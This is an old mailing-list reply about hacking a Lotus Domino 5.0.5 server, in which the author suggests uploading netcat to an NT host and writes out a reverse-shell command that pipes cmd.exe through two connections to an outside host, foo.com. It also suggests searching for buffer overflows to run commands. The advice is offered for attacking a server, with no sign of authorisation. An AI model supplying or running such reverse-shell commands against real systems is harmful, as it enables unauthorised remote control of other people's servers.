Re: Hacking Lotus Domino 5.0.5

From: 'ken'@FTU
Date: Mon Oct 15 2001 - 16:33:31 PDT

    I suspect from your email that your Domino server is on an NT box as
    opposed to an AS/400.

    If it's a 400 your somewhat out of luck because few, if any, tools exist
    for 400 hacking.

    If its NT here's an idea:
      If you can place a file on the machine put netcat on the machine.You
    can  then get a shell back with the command: nc foo.com [your inbound
    port] | cmd.exe | nc foo.com [your outbount port]
    you can now send commands to your inbound port and watch the result on
    your out bound port.

    You can always search for buffer overflows. If one is found you could
    possibly excute commands, or do other stuff, within the server's
    permission level.

    Hope this helps.

    'ken'